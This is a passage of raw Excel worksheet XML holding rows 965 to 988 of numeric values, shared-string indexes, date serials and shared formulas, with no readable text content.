      </c>
      <c r="H965" s="4">
        <v>44415.135416666664</v>
      </c>
      <c r="I965" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J965" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K965" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L965" s="1">
        <v>6.0</v>
      </c>
      <c r="M965" s="1">
        <v>12.0</v>
      </c>
      <c r="N965" s="1" t="s">
        <v>104</v>
      </c>
      <c r="O965" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P965" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q965" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R965" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S965" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="966">
      <c r="A966" s="1">
        <v>11894.0</v>
      </c>
      <c r="B966" s="2" t="s">
        <v>4192</v>
      </c>
      <c r="C966" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D966" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E966" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F966" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G966" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H966" s="4">
        <v>44415.13611111111</v>
      </c>
      <c r="I966" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J966" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K966" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L966" s="1">
        <v>6.0</v>
      </c>
      <c r="M966" s="1">
        <v>12.0</v>
      </c>
      <c r="N966" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O966" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P966" s="1" t="s">
        <v>4193</v>
      </c>
      <c r="Q966" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R966" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S966" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="967">
      <c r="A967" s="1">
        <v>11896.0</v>
      </c>
      <c r="B967" s="2" t="s">
        <v>4194</v>
      </c>
      <c r="C967" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D967" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E967" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F967" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G967" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H967" s="4">
        <v>44415.14097222222</v>
      </c>
      <c r="I967" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J967" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K967" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L967" s="1">
        <v>6.0</v>
      </c>
      <c r="M967" s="1">
        <v>12.0</v>
      </c>
      <c r="N967" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O967" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P967" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q967" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R967" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S967" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="968">
      <c r="A968" s="1">
        <v>11897.0</v>
      </c>
      <c r="B968" s="2" t="s">
        <v>4195</v>
      </c>
      <c r="C968" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D968" s="2" t="s">
        <v>4180</v>
      </c>
      <c r="E968" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F968" s="1" t="s">
        <v>500</v>
      </c>
      <c r="G968" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H968" s="4">
        <v>44415.16388888889</v>
      </c>
      <c r="I968" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J968" s="1" t="s">
        <v>4181</v>
      </c>
      <c r="K968" s="2" t="s">
        <v>4182</v>
      </c>
      <c r="L968" s="1">
        <v>6.0</v>
      </c>
      <c r="M968" s="1">
        <v>12.0</v>
      </c>
      <c r="N968" s="1" t="s">
        <v>276</v>
      </c>
      <c r="O968" s="1" t="s">
        <v>4183</v>
      </c>
      <c r="P968" s="1" t="s">
        <v>510</v>
      </c>
      <c r="Q968" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R968" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S968" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="969">
      <c r="A969" s="1">
        <v>11900.0</v>
      </c>
      <c r="B969" s="2" t="s">
        <v>4196</v>
      </c>
      <c r="C969" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D969" s="2" t="s">
        <v>4197</v>
      </c>
      <c r="E969" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F969" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G969" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H969" s="1" t="s">
        <v>4198</v>
      </c>
      <c r="I969" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J969" s="1" t="s">
        <v>4199</v>
      </c>
      <c r="K969" s="2" t="s">
        <v>4200</v>
      </c>
      <c r="L969" s="1">
        <v>1.0</v>
      </c>
      <c r="M969" s="1">
        <v>1.0</v>
      </c>
      <c r="N969" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O969" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P969" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q969" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R969" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S969" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="1">
        <v>11912.0</v>
      </c>
      <c r="B970" s="2" t="s">
        <v>4201</v>
      </c>
      <c r="C970" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D970" s="2" t="s">
        <v>4202</v>
      </c>
      <c r="E970" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F970" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G970" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H970" s="4">
        <v>44502.691666666666</v>
      </c>
      <c r="I970" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J970" s="1" t="s">
        <v>4203</v>
      </c>
      <c r="K970" s="2" t="s">
        <v>4204</v>
      </c>
      <c r="L970" s="1">
        <v>1.0</v>
      </c>
      <c r="M970" s="1">
        <v>1.0</v>
      </c>
      <c r="N970" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O970" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P970" s="1" t="s">
        <v>602</v>
      </c>
      <c r="Q970" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R970" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S970" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="1">
        <v>11913.0</v>
      </c>
      <c r="B971" s="2" t="s">
        <v>4205</v>
      </c>
      <c r="C971" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D971" s="2" t="s">
        <v>4206</v>
      </c>
      <c r="E971" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F971" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G971" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H971" s="4">
        <v>44414.59583333333</v>
      </c>
      <c r="I971" s="1" t="s">
        <v>4078</v>
      </c>
      <c r="J971" s="1" t="s">
        <v>4207</v>
      </c>
      <c r="K971" s="2" t="s">
        <v>4208</v>
      </c>
      <c r="L971" s="1">
        <v>1.0</v>
      </c>
      <c r="M971" s="1">
        <v>1.0</v>
      </c>
      <c r="N971" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O971" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P971" s="1" t="s">
        <v>4209</v>
      </c>
      <c r="Q971" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R971" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S971" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="1">
        <v>11914.0</v>
      </c>
      <c r="B972" s="2" t="s">
        <v>4210</v>
      </c>
      <c r="C972" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D972" s="2" t="s">
        <v>4206</v>
      </c>
      <c r="E972" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F972" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G972" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H972" s="4">
        <v>44414.59652777778</v>
      </c>
      <c r="I972" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J972" s="1" t="s">
        <v>4211</v>
      </c>
      <c r="K972" s="2" t="s">
        <v>4208</v>
      </c>
      <c r="L972" s="1">
        <v>2.0</v>
      </c>
      <c r="M972" s="1">
        <v>2.0</v>
      </c>
      <c r="N972" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O972" s="1" t="s">
        <v>4212</v>
      </c>
      <c r="P972" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q972" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R972" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S972" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="1">
        <v>11916.0</v>
      </c>
      <c r="B973" s="2" t="s">
        <v>4213</v>
      </c>
      <c r="C973" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D973" s="2" t="s">
        <v>4214</v>
      </c>
      <c r="E973" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F973" s="1" t="s">
        <v>153</v>
      </c>
      <c r="G973" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H973" s="4">
        <v>43202.254166666666</v>
      </c>
      <c r="I973" s="1" t="s">
        <v>154</v>
      </c>
      <c r="J973" s="1" t="s">
        <v>4215</v>
      </c>
      <c r="K973" s="2" t="s">
        <v>4216</v>
      </c>
      <c r="L973" s="1">
        <v>1.0</v>
      </c>
      <c r="M973" s="1">
        <v>1.0</v>
      </c>
      <c r="N973" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O973" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P973" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q973" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R973" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S973" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="1">
        <v>11917.0</v>
      </c>
      <c r="B974" s="2" t="s">
        <v>4213</v>
      </c>
      <c r="C974" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D974" s="2" t="s">
        <v>4214</v>
      </c>
      <c r="E974" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F974" s="1" t="s">
        <v>153</v>
      </c>
      <c r="G974" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H974" s="4">
        <v>43202.25555555556</v>
      </c>
      <c r="I974" s="1" t="s">
        <v>3954</v>
      </c>
      <c r="J974" s="1" t="s">
        <v>4217</v>
      </c>
      <c r="K974" s="2" t="s">
        <v>4216</v>
      </c>
      <c r="L974" s="1">
        <v>2.0</v>
      </c>
      <c r="M974" s="1">
        <v>5.0</v>
      </c>
      <c r="N974" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O974" s="1" t="s">
        <v>4218</v>
      </c>
      <c r="P974" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q974" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R974" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S974" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="1">
        <v>11922.0</v>
      </c>
      <c r="B975" s="2" t="s">
        <v>4219</v>
      </c>
      <c r="C975" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D975" s="2" t="s">
        <v>4220</v>
      </c>
      <c r="E975" s="2" t="s">
        <v>4221</v>
      </c>
      <c r="F975" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G975" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H975" s="1" t="s">
        <v>4222</v>
      </c>
      <c r="I975" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J975" s="1" t="s">
        <v>4223</v>
      </c>
      <c r="K975" s="2" t="s">
        <v>4224</v>
      </c>
      <c r="L975" s="1">
        <v>1.0</v>
      </c>
      <c r="M975" s="1">
        <v>1.0</v>
      </c>
      <c r="N975" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O975" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P975" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q975" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R975" s="2">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="S975" s="1">
        <f t="shared" si="3"/>
        <v>8</v>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="1">
        <v>12338.0</v>
      </c>
      <c r="B976" s="2" t="s">
        <v>4225</v>
      </c>
      <c r="C976" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D976" s="2" t="s">
        <v>4226</v>
      </c>
      <c r="E976" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F976" s="1" t="s">
        <v>4227</v>
      </c>
      <c r="G976" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H976" s="1" t="s">
        <v>4228</v>
      </c>
      <c r="I976" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J976" s="1" t="s">
        <v>4229</v>
      </c>
      <c r="K976" s="2" t="s">
        <v>4230</v>
      </c>
      <c r="L976" s="1">
        <v>1.0</v>
      </c>
      <c r="M976" s="1">
        <v>1.0</v>
      </c>
      <c r="N976" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O976" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P976" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q976" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R976" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S976" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="1">
        <v>12339.0</v>
      </c>
      <c r="B977" s="2" t="s">
        <v>4231</v>
      </c>
      <c r="C977" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D977" s="2" t="s">
        <v>111</v>
      </c>
      <c r="E977" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F977" s="1" t="s">
        <v>4232</v>
      </c>
      <c r="G977" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H977" s="1" t="s">
        <v>4233</v>
      </c>
      <c r="I977" s="1" t="s">
        <v>4234</v>
      </c>
      <c r="J977" s="1" t="s">
        <v>4235</v>
      </c>
      <c r="K977" s="2" t="s">
        <v>4236</v>
      </c>
      <c r="L977" s="1">
        <v>5.0</v>
      </c>
      <c r="M977" s="1">
        <v>5.0</v>
      </c>
      <c r="N977" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O977" s="1" t="s">
        <v>4237</v>
      </c>
      <c r="P977" s="1" t="s">
        <v>1338</v>
      </c>
      <c r="Q977" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R977" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S977" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="1">
        <v>12358.0</v>
      </c>
      <c r="B978" s="2" t="s">
        <v>4238</v>
      </c>
      <c r="C978" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D978" s="2" t="s">
        <v>4239</v>
      </c>
      <c r="E978" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F978" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G978" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H978" s="4">
        <v>44507.93263888889</v>
      </c>
      <c r="I978" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J978" s="1" t="s">
        <v>4240</v>
      </c>
      <c r="K978" s="2" t="s">
        <v>4241</v>
      </c>
      <c r="L978" s="1">
        <v>3.0</v>
      </c>
      <c r="M978" s="1">
        <v>4.0</v>
      </c>
      <c r="N978" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O978" s="1" t="s">
        <v>4242</v>
      </c>
      <c r="P978" s="1" t="s">
        <v>4243</v>
      </c>
      <c r="Q978" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R978" s="2">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="S978" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="1">
        <v>12708.0</v>
      </c>
      <c r="B979" s="2" t="s">
        <v>4244</v>
      </c>
      <c r="C979" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D979" s="2" t="s">
        <v>4245</v>
      </c>
      <c r="E979" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F979" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G979" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H979" s="1" t="s">
        <v>4246</v>
      </c>
      <c r="I979" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J979" s="1" t="s">
        <v>4247</v>
      </c>
      <c r="K979" s="2" t="s">
        <v>4248</v>
      </c>
      <c r="L979" s="1">
        <v>1.0</v>
      </c>
      <c r="M979" s="1">
        <v>1.0</v>
      </c>
      <c r="N979" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O979" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P979" s="1" t="s">
        <v>4249</v>
      </c>
      <c r="Q979" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R979" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S979" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="1">
        <v>12718.0</v>
      </c>
      <c r="B980" s="2" t="s">
        <v>4250</v>
      </c>
      <c r="C980" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D980" s="2" t="s">
        <v>4251</v>
      </c>
      <c r="E980" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F980" s="1" t="s">
        <v>536</v>
      </c>
      <c r="G980" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H980" s="1" t="s">
        <v>4252</v>
      </c>
      <c r="I980" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J980" s="1" t="s">
        <v>4253</v>
      </c>
      <c r="K980" s="2" t="s">
        <v>4254</v>
      </c>
      <c r="L980" s="1">
        <v>2.0</v>
      </c>
      <c r="M980" s="1">
        <v>2.0</v>
      </c>
      <c r="N980" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O980" s="1" t="s">
        <v>688</v>
      </c>
      <c r="P980" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q980" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R980" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S980" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="1">
        <v>12720.0</v>
      </c>
      <c r="B981" s="2" t="s">
        <v>4255</v>
      </c>
      <c r="C981" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D981" s="2" t="s">
        <v>4256</v>
      </c>
      <c r="E981" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F981" s="1" t="s">
        <v>4257</v>
      </c>
      <c r="G981" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H981" s="1" t="s">
        <v>4258</v>
      </c>
      <c r="I981" s="1" t="s">
        <v>1292</v>
      </c>
      <c r="J981" s="1" t="s">
        <v>4259</v>
      </c>
      <c r="K981" s="2" t="s">
        <v>4260</v>
      </c>
      <c r="L981" s="1">
        <v>1.0</v>
      </c>
      <c r="M981" s="1">
        <v>1.0</v>
      </c>
      <c r="N981" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O981" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P981" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q981" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R981" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S981" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="1">
        <v>12725.0</v>
      </c>
      <c r="B982" s="2" t="s">
        <v>4261</v>
      </c>
      <c r="C982" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D982" s="2" t="s">
        <v>4262</v>
      </c>
      <c r="E982" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F982" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G982" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H982" s="1" t="s">
        <v>4263</v>
      </c>
      <c r="I982" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J982" s="1" t="s">
        <v>4264</v>
      </c>
      <c r="K982" s="2" t="s">
        <v>4265</v>
      </c>
      <c r="L982" s="1">
        <v>1.0</v>
      </c>
      <c r="M982" s="1">
        <v>1.0</v>
      </c>
      <c r="N982" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O982" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P982" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q982" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R982" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S982" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="1">
        <v>12749.0</v>
      </c>
      <c r="B983" s="2" t="s">
        <v>4266</v>
      </c>
      <c r="C983" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D983" s="2" t="s">
        <v>4267</v>
      </c>
      <c r="E983" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F983" s="1" t="s">
        <v>741</v>
      </c>
      <c r="G983" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H983" s="1" t="s">
        <v>4268</v>
      </c>
      <c r="I983" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J983" s="1" t="s">
        <v>4269</v>
      </c>
      <c r="K983" s="2" t="s">
        <v>4270</v>
      </c>
      <c r="L983" s="1">
        <v>1.0</v>
      </c>
      <c r="M983" s="1">
        <v>1.0</v>
      </c>
      <c r="N983" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O983" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P983" s="1" t="s">
        <v>456</v>
      </c>
      <c r="Q983" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R983" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S983" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="1">
        <v>12815.0</v>
      </c>
      <c r="B984" s="2" t="s">
        <v>4271</v>
      </c>
      <c r="C984" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D984" s="2" t="s">
        <v>4272</v>
      </c>
      <c r="E984" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F984" s="1" t="s">
        <v>232</v>
      </c>
      <c r="G984" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H984" s="1" t="s">
        <v>4273</v>
      </c>
      <c r="I984" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J984" s="1" t="s">
        <v>4274</v>
      </c>
      <c r="K984" s="2" t="s">
        <v>4275</v>
      </c>
      <c r="L984" s="1">
        <v>4.0</v>
      </c>
      <c r="M984" s="1">
        <v>4.0</v>
      </c>
      <c r="N984" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O984" s="1" t="s">
        <v>4276</v>
      </c>
      <c r="P984" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q984" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R984" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S984" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="985">
      <c r="A985" s="1">
        <v>12819.0</v>
      </c>
      <c r="B985" s="2" t="s">
        <v>4277</v>
      </c>
      <c r="C985" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D985" s="2" t="s">
        <v>4278</v>
      </c>
      <c r="E985" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F985" s="1" t="s">
        <v>4279</v>
      </c>
      <c r="G985" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H985" s="1" t="s">
        <v>4280</v>
      </c>
      <c r="I985" s="1" t="s">
        <v>4281</v>
      </c>
      <c r="J985" s="1" t="s">
        <v>4282</v>
      </c>
      <c r="K985" s="2" t="s">
        <v>4283</v>
      </c>
      <c r="L985" s="1">
        <v>1.0</v>
      </c>
      <c r="M985" s="1">
        <v>1.0</v>
      </c>
      <c r="N985" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O985" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P985" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q985" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R985" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S985" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="986">
      <c r="A986" s="1">
        <v>12820.0</v>
      </c>
      <c r="B986" s="2" t="s">
        <v>4284</v>
      </c>
      <c r="C986" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D986" s="2" t="s">
        <v>4285</v>
      </c>
      <c r="E986" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F986" s="1" t="s">
        <v>4286</v>
      </c>
      <c r="G986" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H986" s="4">
        <v>44778.020833333336</v>
      </c>
      <c r="I986" s="1" t="s">
        <v>4287</v>
      </c>
      <c r="J986" s="1" t="s">
        <v>4288</v>
      </c>
      <c r="K986" s="2" t="s">
        <v>4289</v>
      </c>
      <c r="L986" s="1">
        <v>1.0</v>
      </c>
      <c r="M986" s="1">
        <v>1.0</v>
      </c>
      <c r="N986" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O986" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P986" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q986" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R986" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S986" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="987">
      <c r="A987" s="1">
        <v>12821.0</v>
      </c>
      <c r="B987" s="2" t="s">
        <v>4290</v>
      </c>
      <c r="C987" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D987" s="2" t="s">
        <v>4291</v>
      </c>
      <c r="E987" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F987" s="1" t="s">
        <v>1187</v>
      </c>
      <c r="G987" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H987" s="4">
        <v>44142.81805555556</v>
      </c>
      <c r="I987" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J987" s="1" t="s">
        <v>4292</v>
      </c>
      <c r="K987" s="2" t="s">
        <v>4293</v>
      </c>
      <c r="L987" s="1">
        <v>4.0</v>
      </c>
      <c r="M987" s="1">
        <v>5.0</v>
      </c>
      <c r="N987" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O987" s="1" t="s">
        <v>4294</v>
      </c>
      <c r="P987" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q987" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R987" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S987" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="988">
      <c r="A988" s="1">
        <v>12822.0</v>
      </c>
      <c r="B988" s="2" t="s">
        <v>4295</v>
      </c>
      <c r="C988" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D988" s="2" t="s">
        <v>4291</v>
      </c>
      <c r="E988" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F988" s="1" t="s">
        <v>4296</v>
      </c>
      <c r="G988" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H988" s="4">
        <v>44142.822222222225</v>
      </c>
      <c r="I988" s="1" t="s">
        <v>1189</v>
      </c>
      <c r="J988" s="1" t="s">
        <v>4292</v>
      </c>
      <c r="K988" s="2" t="s">
        <v>4293</v>
      </c>
      <c r="L988" s="1">
        <v>4.0</v>
      </c>
      <c r="M988" s="1">
        <v>5.0</v>
      </c>
      <c r="N988" s="1" t="s">
        <v>187</v>
      </c>
      <c r="O988" s="1" t="s">
        <v>4294</v>
      </c>
      <c r="P988" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q988" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
